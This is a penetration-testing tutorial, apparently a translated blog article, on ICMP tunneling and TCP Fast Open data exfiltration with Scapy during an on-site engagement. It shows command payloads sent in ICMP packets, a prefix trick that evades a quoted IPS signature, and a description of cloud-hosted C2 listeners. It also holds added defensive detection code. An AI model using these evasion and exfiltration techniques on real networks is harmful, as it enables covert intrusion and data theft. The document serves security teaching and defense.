Practical Insider Threat Penetration Testing Cases with Scapy (Shell Payloads and Protocol Evasion)

As the penetration testing landscape evolves and morphs, everyone seems to be “hot and heavy” on app-based testing, whether that means fuzzing a thick client or an API. One of the key things I’ve found with many clients is that they’ve gone “soft” on proper insider threat hygiene, starting with network security basics. In this article, I’ll run through (2) scripts that I’ve written in Python using Scapy’s framework that can help in many use cases: red team tunneling, purple team IOCs, and general defender foundations. Let’s get the housekeeping out of the way:

*Disclaimer* — The tools and methodologies shown in this article are for security enhancement needs, education, and experimental use. Do not run or perform any illegal, unethical, or otherwise troublesome activities that violate policies, compliance requirements, or legislation locally or internationally.

Why this article?: Many newer security professionals in the field start rolling their eyes, followed by deep, heavy groans, when I still teach red and blue teams diligence in the network security fundamentals as well. No matter what your stance is on where penetration testing, red teaming, and general security ops defense tactics are going, there is no denying that the foundations almost never change. In a recent client-facing engagement, a colleague (Michael LaSalvia) and I were tasked with an on-site pen test (very rare in today’s remote-‘only’ run-of-the-mill testing). What we found were some oversights at the network security level that our existing toolsets and rapid Googling just did not cover, so we had to turn to building our own. This is not a full-blown article on how to use Scapy, but one that showcases some extended use cases for it during a pen test.

What did we find exactly?: The lowly ICMP echo requests/responses could be sent and received, with lots of nice error details for recon and mapping, from a lower security trust zone to a higher trust zone that typically would not have access. We also discovered that, despite some best-in-class vendor IPS firewalls between the varying trust zones with a heavy focus on content signatures, we were able to use “old school” tunneling over ICMP, and over TCP using TCP options, particularly “TCP Fast Open” (TFO). TFO, known by its other term “TCP SYN cookies”, aids in tracking and reducing Denial of Service attacks and can potentially ‘speed up’ web servers by allowing data to be received on a SYN-initiated session early on, before the handshake completes. There were a multitude of other findings we had for this client, but we’re going to focus on these two very practical and easy-to-test use cases for Scapy and Python.

When to use Scapy when there are other tools?: Scapy is very extensible and so much more useful than meets the eye, beyond the basic one-off spoofed send/receive packets or port checks that you know Nmap, Hping3, Netcat, and PowerShell cmdlets like Test-NetConnection can do. The interesting thing about all of those is that they do best when you’re operating against a service listening at Layer 4 and above, i.e. ports. In our own situation and testing, we found that we could still funnel data in and out of the network even without having access to a port to shovel a shell over. Now, there are other tools such as the famous ptunnel and forks of it. But finding a modern pre-compiled binary that is not laced with malware and that will actually work on Windows is difficult at best. Not to mention that tool really makes its best use with an external listener/proxy, which we had limited access to, with lots of north/south visibility on the IPS and web content filtering. We also had NAC in the way, profiling our hosts and not handing out IPs to any non-Windows hosts. Fun. Scapy does great in times of need when:

  • You need tools that are semi-portable between Windows and Linux, using a mutually trusted, commonly available language like Python

  • When you need to perform actions on a per-packet basis

  • When other tools fail or don’t work right at the network level for mangling and transforms, e.g. Ettercap/Bettercap scripts (MiTM changing content/links)

  • When you need to make very specific noise on the network and need to have full control of the payload going out from your interface (you might only get one chance depending on the blue team’s defenses!)

The setup so far: If you’ve been following closely, let’s think through what we do have in our arsenal:

  • ICMP echo requests/responses (nothing else) and TCP option protocol features that are allowed to traverse the different network security zones. We’re also limited, egress-wise and between network zones, to specific ports that can be traversed.

  • Limited access to the network as a whole due to NAC profiling for OS and other components with soft agents. So we’re stuck with having to use Windows boxes for this particular segment of the test.

  • The higher security zone holds corporate employees and other fun items. The lower security zone of the network allows for general visitors to gain Internet access for basic surfing, email, and social media.

Yawn! Get to the good stuff: Introducing some quick scripts created by yours truly: ICMP-bindshell and TCPOptionsDataExfil, both written in Python 3.x using the Scapy framework, and Windows 10 friendly.

ICMP-Bindshell is essentially just a listener that you can send commands to, and it’ll run them on the target or victim host. Why use this? Well, in our case we did not have ICMP access from the higher trusted zone to the lower trusted zone, but the actual reverse: a lower trusted zone could ICMP ping the higher trusted zone and get responses, including port- and host-prohibited administrative messages. We assume this was an oversight, but it was a blessing for us. We could now map out the network and figure out which ports might be open and listening on endpoint hosts versus those blocked by the IPS or firewall. This is perfect for an insider threat or a drop-in device placed in a higher-trusted zone, allowing guest traffic to pivot through or use that host for whatever they really want. ICMP tunneling, when properly combined with denying the echo replies, can keep traffic under the radar. There are times where you may want to allow certain payloads as a buffer prefix, or to allow echo replies so that an IPS concludes it isn’t tunneling because it saw the echo request and response when you spoof the sequence ID numbers.

For example, Windows ping by default will use the following string “abcdefghijklmnopqrstuvwabcdefghi” (capture partially redacted so it can align easily):

0020   00 00 00 00 00 00 00 00 91 61 62 63 64 65 66      .2..T.....abcdef
0030   67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76   ghijklmnopqrstuv
0040   77 61 62 63 64 65 66 67 68 69                     wabcdefghi

By default, if you’re building a single one-off packet you’re going to be doing something like this (even on Windows). Once you have Python and Scapy installed, open up your cmd.exe prompt into Scapy interactive mode and feel free to follow along. Note: we’re using Windows 10 with Scapy 2.4.x installed via ‘pip install scapy’ AFTER you install 64-bit Python 3.x. So let’s take a look at our first Scapy packet emulating an ICMP ping (echo request):

>>> sendpkt = IP(dst="8.8.8.8")/ICMP(type=8)
>>> sendpkt
<IP frag=0 proto=icmp dst=8.8.8.8 |<ICMP type=echo-request |>>
>>> sr1(sendpkt)
Begin emission:
Finished sending 1 packets.
...*
Received 4 packets, got 1 answers, remaining 0 packets
<IP version=4 ihl=5 tos=0x20 len=28 id=0 flags= frag=0 ttl=54 proto=icmp chksum=0x9fd7 src=8.8.8.8 dst=10.10.10.10 |<ICMP type=echo-reply code=0 chksum=0xffff id=0x0 seq=0x0 |<Padding load='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' |>>>
>>>

Note that we’re building a basic header with basic information. Scapy does the rest at the lower layers using our own MAC address and the same source IP, so keep in mind that nothing was spoofed. The example here uses “8.8.8.8”, which is one of Google’s DNS servers open to the public. Notice in our meta-summary information that there’s basic padding, and the interesting thing we see is that our default TTL is different, much closer to 64 initially vs. the standard 128 for Windows. There’s also, as you can see, no payload! You can verify this by running the ls(sendpkt) command; the ls() function takes the packet object we just assigned to “sendpkt”. It looks nothing like a Windows ping/response at all.

That’s one thing to keep in mind with any ICMP tunneling: use your discretion on how you wish to evade tunneling detection, depending on the controls you may have already emulated or guessed; you can even self-test these using Snort, Suricata, or other tools listening on the same interface as your malicious traffic.

So, with the basic evasion “gotcha” out of the way, let’s go ahead and use the ICMP Bind Shell script. Feel free to run it on your own. There is only (1) script, and it is set up as the “listener”. This runs on the victim you want to ‘reach out to’ and run shell commands on. In our case, this was a host in the higher zone, an insider threat host that can be pivoted to from a lower trusted zone. Let’s build the command or packet that we wish to use, in the clear.

**Note on evasion: I did not build in any form of encryption or encoding. Feel free to make your own extension to my base function to decode/decrypt if you don’t want to get any standard clear-text signature content caught in an IPS. To demonstrate this problem, observe the following:

>>> command="whoami"
>>> sendpkt = IP(dst="8.8.8.8")/ICMP(type=8)/Raw(load=command)
>>> sendpkt
<IP frag=0 proto=icmp dst=8.8.8.8 |<ICMP type=echo-request |<Raw load='whoami' |>>>
>>>

We’ve crafted a raw standard ASCII payload and attached it to our packet. Great, let’s send it at L3 so Scapy sets all the default fields and it doesn’t get dropped immediately by the stack. But oh no, we’re immediately blocked by our own north/south IPS, and it’s right there in the logs:

<IP  frag=0 proto=icmp dst=8.8.8.8 |<ICMP  type=echo-request |<Raw  load='whoami' |>>>
>>> sr1(sendpkt, timeout=3)
Begin emission:
Finished sending 1 packets.
...*
Received 4 packets, got 1 answers, remaining 0 packets
<IP version=4 ihl=5 tos=0x20 len=34 id=0 flags= frag=0 ttl=54 proto=icmp chksum=0x9fd1 src=8.8.8.8 dst=10.10.10.10 |<ICMP type=echo-reply code=0 chksum=0xabcc id=0x0 seq=0x0 |<Raw load='whoami' |<Padding load='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' |>>>>
>>> sr1(sendpkt, timeout=3)
Begin emission:
Finished sending 1 packets.
..........
Received 10 packets, got 0 answers, remaining 1 packets
>>>

Here we use sr1 to send one packet and receive one answer. The first packet got through, and then when we run it again, we’re shut off.

ET TROJAN Possible ICMP Backdoor Tunnel Command - whoami - 03/15/2020-06:38:10

alert icmp any any -> any any (msg:"ET TROJAN Possible ICMP Backdoor Tunnel Command - whoami"; itype:8; icode:0; content:"whoami"; depth:6; nocase; metadata: former_category TROJAN; reference:url,www.hackingarticles.in/command-and-control-tunnelling-via-icmp; classtype:trojan-activity; sid:2027763; rev:1; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, signature_severity Major, created_at 2019_07_29, performance_impact Moderate, updated_at 2019_07_29;)

Examining the rule, it looks for that content within a maximum depth of 6 bytes into the payload. While the ICMP-bindshell tool will not do this for you (that doesn’t mean you can’t build it in yourself!), you can always modify your original payload of “whoami” by adding extra meta characters such as the null byte “\x00” or, even better, mask it by putting “abcdefghijklmnopqrstuvwabcdefghi” as a prefix before your ‘actual’ payload, and you may have another way of bypassing a basic signature, assuming pre-processors don’t kick in. So your new payload might look like the following:

>>> command
'whoami'
>>> command = "abcdefghijklmnopqrstuvwabcdefghi" + " whoami"
>>> command
'abcdefghijklmnopqrstuvwabcdefghi whoami'
>>> sendpkt = IP(dst="8.8.8.8")/ICMP(type=8)/Raw(load=command)
>>> sendpkt
<IP frag=0 proto=icmp dst=8.8.8.8 |<ICMP type=echo-request |<Raw load='abcdefghijklmnopqrstuvwabcdefghi whoami' |>>>
>>> sr1(sendpkt, timeout=3)
Begin emission:
Finished sending 1 packets.
...*
Received 4 packets, got 1 answers, remaining 0 packets
<IP version=4 ihl=5 tos=0x20 len=67 id=0 flags= frag=0 ttl=54 proto=icmp chksum=0x9fb0 src=8.8.8.8 dst=10.10.10.10 |<ICMP type=echo-reply code=0 chksum=0x208 id=0x0 seq=0x0 |<Raw load='abcdefghijklmnopqrstuvwabcdefghi whoami' |>>>
>>> sr1(sendpkt, timeout=3)
Begin emission:
Finished sending 1 packets.
.*
Received 2 packets, got 1 answers, remaining 0 packets
<IP version=4 ihl=5 tos=0x20 len=67 id=0 flags= frag=0 ttl=54 proto=icmp chksum=0x9fb0 src=8.8.8.8 dst=10.10.10.10|<ICMP type=echo-reply code=0 chksum=0x208 id=0x0 seq=0x0 |<Raw load='abcdefghijklmnopqrstuvwabcdefghi whoami' |>>>
>>>

Now we’re getting somewhere. Our north/south IPS doesn’t block us because we prepended the famous Windows string. Now it’s your turn; feel free to experiment with the ICMP-bindshell tool and get tunneling!
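As a defender-side complement to the depth-limited signature discussed above, here is an added example of my own (not the article’s code or the ICMP-bindshell tool): a small classifier for ICMP echo payloads that compares the whole payload against what Windows ping would send, so a command appended after the well-known prefix is reported as trailing data instead of slipping under a `depth:6` match. The `depth_rule_matches()` helper, the sample payloads and the Windows pattern generator are my constructions (Windows cycling the letters a..w for any requested length is my understanding of its behaviour); `sniff_icmp()` wires the check into Scapy’s sniff(prn=...) hook, which the tips section later in the article describes, and is the only part that needs Scapy and capture privileges.

```python
"""Added example (my own code, not from the article or the ICMP-bindshell tool):
classify ICMP echo payloads against what Windows ping would send, instead of
looking for a command string within a fixed depth. Standard library only;
Scapy is needed only by sniff_icmp()."""
import itertools

# Windows ping cycles the letters a..w for whatever -l length is requested; the
# default 32 bytes give the string shown in the article's capture (my understanding).
WINDOWS_CYCLE = b"abcdefghijklmnopqrstuvw"
WINDOWS_DEFAULT_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"

def windows_pattern(length: int) -> bytes:
    """The payload bytes a Windows ping of this length would carry."""
    return bytes(itertools.islice(itertools.cycle(WINDOWS_CYCLE), length))

def depth_rule_matches(payload: bytes, content: bytes, depth: int) -> bool:
    """Emulates a Snort/Suricata `content:X; depth:N;` test: X must fall
    entirely within the first N payload bytes, which is why the prefixed
    payload in the article slips past `content:"whoami"; depth:6;`."""
    return content in payload[:depth]

def classify_echo_payload(payload: bytes) -> str:
    """Verdict for the data portion of an echo request (bytes after the 8-byte
    ICMP header): 'benign' (empty, or exactly the Windows pattern),
    'trailing-data' (Windows default pattern followed by extra bytes, the
    bypass the article shows), or 'nonstandard' (anything else)."""
    if not payload:
        return "benign"
    if payload == windows_pattern(len(payload)):
        return "benign"
    n = len(WINDOWS_DEFAULT_PAYLOAD)
    if len(payload) > n and payload[:n] == WINDOWS_DEFAULT_PAYLOAD:
        return "trailing-data"
    return "nonstandard"

def scan_payloads(samples: dict) -> dict:
    """Runs the depth-limited match and the whole-payload classifier side by
    side over name -> payload samples."""
    return {name: {"verdict": classify_echo_payload(p),
                   "depth6_hit": depth_rule_matches(p, b"whoami", 6),
                   "anywhere_hit": b"whoami" in p}
            for name, p in samples.items()}

# Constructed sample payloads mirroring the article's sessions.
SAMPLES = {
    "scapy_no_payload": b"",
    "windows_default": WINDOWS_DEFAULT_PAYLOAD,
    "bare_command": b"whoami",
    "prefixed_command": WINDOWS_DEFAULT_PAYLOAD + b" whoami",
}

def sniff_icmp(iface=None, count=0):
    """Wires the classifier into Scapy's sniff(prn=...) hook, the construct the
    article's tips section describes. Needs Scapy and capture privileges, so it
    is imported here rather than at module level; iface/count go straight to sniff()."""
    from scapy.all import sniff, IP, ICMP, Raw

    def on_packet(pkt):
        if pkt.haslayer(ICMP) and pkt[ICMP].type == 8:
            payload = bytes(pkt[Raw].load) if pkt.haslayer(Raw) else b""
            verdict = classify_echo_payload(payload)
            if verdict != "benign":
                print("%s -> %s: %s (%d bytes)" % (pkt[IP].src, pkt[IP].dst, verdict, len(payload)))

    sniff(filter="icmp", prn=on_packet, iface=iface, count=count, store=False)

if __name__ == "__main__":
    for name, r in scan_payloads(SAMPLES).items():
        print("%-18s verdict=%-13s depth6=%-5s anywhere=%s"
              % (name, r["verdict"], r["depth6_hit"], r["anywhere_hit"]))
```

Run as a script it prints the verdict for each constructed sample next to the depth-6 and whole-payload matches; the prefixed command is the row where the depth-limited match is False while the classifier still reports trailing data. The classifier only knows the Windows pattern, so in a real deployment you would add the other known-good payloads on your network (Linux ping’s timestamp followed by a 0x10..0x37 byte ramp, for instance) before treating “nonstandard” as an alert.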

What next?: Next up, we have TCPOptionsDataExfil, which isn’t so much shell code (although you could turn it into a C2 channel if you so desire, or extend it). This tool has a client (sender) and a listener (receiver). I’ve made them interactive so you can just worry about using the tool and seeing how the TFO feature can be used for tunneling data, or for shelling out to a malicious host, regardless of whether that host has a port open or not. Now remember, the firewall or egress policy still requires you to actually have a route ‘OUT’ to the host. But you don’t have to expose yourself using a traditional Metasploit multi/handler and begin port-forwarding everything. You can rely on BPF rules, which you can set yourself in the tool, for lockdown.

In our case, we used it (*a private extended version of the one I’ve made public, sorry script kiddies :-) ) to tunnel data out and as an alternate C2 channel, since the lower trusted security zone still goes through a web content filter. We spun up common instances of our listener on services such as Google Cloud Platform (GCP), Azure, and Amazon EC2, as those are commonly trusted FQDNs and IPs usually whitelisted in today’s modern hybrid network. So, with the same Python and Scapy combo, we fired up TCPfastcookie_listener.py out on our VPS and then set up the TCPfastcookie_dataexfil.py script to exfil our data (in the clear for the public edition) using ONLY a TCP option. We did add an extra “null” byte (“\x00”) to the payload towards the end, just to give it something more than a 0-byte payload.

In the interactive session screens below you can see that we use basic test data and have played around with the Scapy tuple requirements in how Python sets up and uses lists for TCP Options.

[Screenshot: interactive sessions of TCPfastcookie_listener.py and TCPfastcookie_dataexfil.py]

I won’t waste time explaining how you should use the server/client. It’s interactive; follow the readme and you should be fine. The screenshot is fairly self-explanatory: using TCP SYN cookies sent to the closed port 8000, we were able to send the data stream we wanted out. Of course, in Python, redirecting standard out in an interactive session is more irritating than a standard “>> /tmp/foo.txt” in a shell script. The file is appended to at the system path you define when you run the tool.
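To make concrete what the listener above is actually receiving, here is an added example of my own (not the article’s TCPfastcookie_* scripts): a byte-level parser for a raw TCP segment that pulls the options apart, recognises the TFO cookie option (kind 34, RFC 7413) and reports a SYN that carries data, which is exactly the shape of traffic the tool relies on and the shape a defender would want to flag on a port that has no listener. The `build_tcp_segment()`, `tfo_option()` and `mss_option()` helpers and both sample segments are my constructions for feeding the parser; the `open_ports` argument is an assumed input describing which ports you actually serve. It needs only the standard library, so it runs without Scapy; in Scapy terms the same option is, to my understanding, expressed as a `(34, cookie_bytes)` tuple in `TCP(options=[...])`, which is the tuple shape the article refers to.

```python
"""Added example (my own code, not the article's TCPfastcookie_* scripts):
parse a raw TCP segment, pull its options apart and flag a SYN that carries
data through a TCP Fast Open (TFO) cookie option. Standard library only."""
import struct

# Option kinds per the IANA TCP option registry; 34 is the TFO cookie (RFC 7413).
OPT_END, OPT_NOP, OPT_MSS, OPT_TFO = 0, 1, 2, 34
FLAG_SYN, FLAG_ACK = 0x02, 0x10

def parse_tcp_options(raw: bytes) -> list:
    """Returns [(kind, value_bytes), ...] for a TCP header's options area.
    Malformed lengths raise rather than being silently skipped."""
    opts, i = [], 0
    while i < len(raw):
        kind = raw[i]
        if kind == OPT_END:
            break
        if kind == OPT_NOP:
            opts.append((kind, b""))
            i += 1
            continue
        if i + 1 >= len(raw):
            raise ValueError("option kind %d has no length byte" % kind)
        length = raw[i + 1]
        if length < 2 or i + length > len(raw):
            raise ValueError("option kind %d has bad length %d" % (kind, length))
        opts.append((kind, raw[i + 2:i + length]))
        i += length
    return opts

def inspect_tcp_segment(segment: bytes, open_ports=frozenset()) -> dict:
    """Takes a TCP segment (header + payload, IP header already stripped) and
    returns the parsed fields plus a list of findings for a SYN that carries data.
    open_ports is the set of ports you actually serve; anything else counts as closed."""
    sport, dport, seq, ack, off_flags, win, csum, urg = struct.unpack("!HHIIHHHH", segment[:20])
    data_offset = (off_flags >> 12) * 4
    flags = off_flags & 0x01FF
    options = parse_tcp_options(segment[20:data_offset])
    payload = segment[data_offset:]
    tfo = [v for k, v in options if k == OPT_TFO]
    findings = []
    if flags & FLAG_SYN and not flags & FLAG_ACK:
        if tfo:
            cookie = tfo[0]
            if cookie and not 4 <= len(cookie) <= 16:
                findings.append("TFO cookie length %d outside the 4..16 bytes RFC 7413 allows" % len(cookie))
            if payload:
                findings.append("SYN carries %d bytes of data via a TFO cookie" % len(payload))
        elif payload:
            findings.append("SYN carries %d bytes of data without a TFO option" % len(payload))
        if payload and dport not in open_ports:
            findings.append("data-bearing SYN to port %d, which has no listener" % dport)
    return {"sport": sport, "dport": dport, "syn": bool(flags & FLAG_SYN),
            "options": options, "tfo_cookie_len": len(tfo[0]) if tfo else None,
            "payload_len": len(payload), "findings": findings}

def tfo_option(cookie: bytes) -> bytes:
    """Encodes a TFO cookie option: kind 34, length 2 + len(cookie), cookie."""
    return bytes([OPT_TFO, 2 + len(cookie)]) + cookie

def mss_option(mss: int) -> bytes:
    """Encodes an MSS option: kind 2, length 4, 16-bit value."""
    return bytes([OPT_MSS, 4]) + struct.pack("!H", mss)

def build_tcp_segment(sport, dport, flags, options=b"", payload=b"") -> bytes:
    """Builds a constructed test segment (checksum left at zero; this is input
    for the parser, not something to put on the wire)."""
    options += b"\x00" * (-len(options) % 4)          # pad options to a 32-bit boundary
    data_offset = (20 + len(options)) // 4
    header = struct.pack("!HHIIHHHH", sport, dport, 1, 0, (data_offset << 12) | flags, 65535, 0, 0)
    return header + options + payload

# Constructed samples: a normal SYN to 443, and a TFO SYN pushing data at a closed
# port 8000, the pattern the article's listener/sender pair uses.
NORMAL_SYN = build_tcp_segment(40000, 443, FLAG_SYN, mss_option(1460))
TFO_SYN_WITH_DATA = build_tcp_segment(40001, 8000, FLAG_SYN, tfo_option(b"\x11" * 8), b"test data\x00")

if __name__ == "__main__":
    for name, seg in (("normal", NORMAL_SYN), ("tfo-exfil", TFO_SYN_WITH_DATA)):
        r = inspect_tcp_segment(seg, open_ports={443})
        print(name, r["dport"], r["tfo_cookie_len"], r["payload_len"], r["findings"] or "ok")
```

The two findings on the second sample are the two things worth alerting on from the receiving side: a SYN is carrying a payload at all, and it is doing so toward a port where nothing is listening, so no legitimate TFO-aware service could have handed out that cookie. A flow record or IPS that only looks at the stream after the handshake never sees either.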

[Screenshot]

Thanks for the scripts, but I still can’t use Scapy for more than the interactive session. What features are you finding useful, or what Python constructs would help me?: This is probably the hardest part for any engineer. You’re going to have to build what you need on the fly in some cases. But here are some helpful points to help you maximize your usage of Scapy beyond sending a couple of packets:

  • When using the sniff() function, you can combine it with the “prn=” argument. This lets you create your own function in Python that Scapy calls on a per-packet basis. Combine it with the filter argument and the count argument and you can really control what traverses the wire, including mangling and man-in-the-middle applications, as some of you might have seen in the GXPN (SEC 660).

  • If you’re new to Python, I recommend starting with 3.x because it enforces more ‘structure’ and is the new long-term support standard. For your basic loops and conditional statements, nothing really changes. One of the things I had a hard time dealing with is the Python constructs and how people ‘named’ things in their various scripts. One thing to consider is that you can assign any object a “value”. That value is like the ‘back tick’ of executing a shell command inside a variable in Bash, e.g. $foo = `cat /etc/passwd`, and if you echo $foo it should give you the content results. This is the same in Python, esp. when you use Scapy’s functions (send, sendp, sr1, sr0, etc.). Once you set ans, unans = sr1(blah blah), it’s going to execute it. So don’t set any objects in interactive mode unless you’re ready for it to execute and obtain the value instantly. Also remember that the indentation hierarchy is a must for all conditional statements, functions, and loops.

  • Another Python tip is how people define functions. You don’t have to be a math wizard to create a function. A function can have multiple functions nested inside, like our tools, and can be combined with if/else conditional statements. Remember that the order of variables visible to each function is based on top-down hierarchical scope if you’re thinking about it from a start-to-stop script. Programmers will hate me for using that analogy and definition, as there’s local, global, etc. But it just makes it easier to understand for general “script”-minded people. Next, you’ll often see a “return” statement with a function, or not. A return statement simply gives you back a value at the end of the execution of that function. So if you want the function to give you some output into a variable after you call it, you use a return statement. For example:

# Python: my first function example
>>> nslookup 8.8.8.8
  File "<stdin>", line 1
    nslookup 8.8.8.8
             ^
SyntaxError: invalid syntax
# uh oh, can't directly make an external program call easily, hmm...
# let's use a function so I can get on with my day and 'cheat' using external calls while scripting other stuff in Python
>>> import os, sys
>>> os.system("nslookup 8.8.8.8")
Server:  dns.scissecurity.com
Address:  10.10.10.1

Name:    dns.google
Address:  8.8.8.8
0
>>>
# Hey, now we're getting somewhere! That was annoying to type and I don't just want to look up DNS; I want it to also ping and tell me what my host IP was again in the return. Here we go!

# default libraries, imported natively in Python
import os, sys
# let's grab something interactively from the user and make it a string type
hostinput = str(input("put in an IP or FQDN: "))
# create our own function and only return the value of calcfoo
def chowrecon(arg1):
    # os.system() hands the string to the shell; its output goes straight to stdout, not back to us
    os.system("nslookup" + ' ' + arg1)
    os.system("ping" + ' ' + arg1)
    calcfoo = ("return something to stdout: " + arg1)
    return calcfoo
# run the function and assign its return value to a variable
foo = chowrecon(hostinput)
# you've got to print the returned value
print(foo)
[Screenshot: running the chowrecon example]

*Note: I’ve set up the function in a very particular way. Notice how it only returned ONE output. You can only specify one argument/variable that the function is supposed to run. If you also look closely, return is only capturing my echo of ‘return something to stdout’ with the hostname after the function has finished running. It is important to note that os.system did not return the values of the function to the original caller. os.system by default writes to standard out and that’s it. If you need it redirected elsewhere, you need to use something like check_output or os.popen. Popen() is more forgiving than check_output(), as an error raised via check_output() will stop the Python script and Popen() does not.
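To show the difference the note above describes in running code, here is an added example of my own (not the article’s chowrecon()): the command runs through subprocess with an argument list, so its output comes back to the caller as a return value instead of going straight to stdout, a non-zero exit is reported rather than ending the script, and a user-supplied host arrives at nslookup as one literal argument even if it contains shell metacharacters. The helper names (run_capture, run_or_none, recon) and the sys.executable-based sample commands are my constructions; nslookup and ping are only invoked by recon(), which the offline demo does not call.

```python
"""Added example (my own code, not the article's): return an external command's
output to the caller instead of letting it fall through to stdout as os.system()
does. Standard library only."""
import subprocess
import sys

def run_capture(argv: list, timeout: float = 30) -> dict:
    """Runs argv (a list, so no shell parses it) and returns the exit status and
    captured stdout/stderr. Like Popen(), a non-zero exit does not raise; a
    missing binary or a hang is reported in the same shape instead of crashing."""
    try:
        proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    except FileNotFoundError:
        return {"rc": 127, "out": "", "err": "%s: command not found" % argv[0]}
    except subprocess.TimeoutExpired:
        return {"rc": None, "out": "", "err": "%s: timed out after %ss" % (argv[0], timeout)}
    return {"rc": proc.returncode, "out": proc.stdout, "err": proc.stderr}

def run_or_none(argv: list):
    """check_output() behaviour from the note: a non-zero exit raises
    CalledProcessError. Catching it here is what keeps the script alive."""
    try:
        return subprocess.check_output(argv, text=True)
    except (subprocess.CalledProcessError, FileNotFoundError):
        return None

def recon(host: str) -> dict:
    """Counterpart to the article's chowrecon(): the host is one argv element, so a
    value like '8.8.8.8; echo injected' reaches nslookup as a literal argument rather
    than as a second shell command, and both outputs come back in the return value."""
    count_flag = "-n" if sys.platform.startswith("win") else "-c"   # ping's count flag differs per OS
    return {"nslookup": run_capture(["nslookup", host]),
            "ping": run_capture(["ping", count_flag, "2", host])}

# Constructed sample commands built on the running interpreter so the demo works
# offline on any OS and without network tools installed.
ECHO_ARG1 = [sys.executable, "-c", "import sys; print(sys.argv[1])"]
EXIT_3 = [sys.executable, "-c", "import sys; sys.exit(3)"]

def demo() -> dict:
    """Exercises the three behaviours above; results are returned, not printed."""
    hostile = "8.8.8.8; echo injected"
    return {
        "one_argument": run_capture(ECHO_ARG1 + [hostile]),   # whole string is argv[1]
        "nonzero_exit": run_capture(EXIT_3),                  # rc 3, script keeps going
        "check_output": run_or_none(EXIT_3),                  # None instead of a traceback
        "missing_bin": run_capture(["no-such-tool-xyz"]),     # rc 127
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(name, "->", result)
```

The point of the argument-list form is the same one the note makes about os.system(): the shell never sees the string, so nothing in it is interpreted, and whatever the tool printed is in the returned dict for you to parse, log or send wherever the script needs it.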

Summary:

I hope you enjoyed seeing these use cases of Scapy and Python to maximize your ROI during a pen test engagement, or whichever sec ops function you decide to pursue. While I enjoyed my weekend project of creating these scripts and tutorials, I’m still more of a PowerShell fan and only wish Scapy were ported to PowerShell (perhaps one day).

Drop me a line and let me know what you thought of this article and the tools!

Dennis Chow, MBA GXPN, GREM, CISSP

Chief Information Security Officer of SCIS Security

Translated from: https://medium.com/swlh/practical-insider-threat-penetration-testing-cases-with-scapy-shell-code-and-protocol-evasion-e18d43d50da
